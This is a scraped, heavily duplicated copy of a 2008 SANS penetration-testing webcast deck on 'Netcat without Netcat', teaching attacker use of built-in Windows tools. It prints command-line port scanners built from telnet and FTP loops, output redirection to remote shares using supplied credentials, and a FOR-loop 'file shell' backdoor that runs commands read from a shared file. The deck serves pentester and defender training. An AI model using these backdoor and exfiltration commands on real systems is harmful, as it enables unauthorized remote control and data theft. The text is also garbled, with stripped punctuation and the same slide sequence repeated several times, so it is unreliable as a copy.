Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 24
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 25
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 26
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
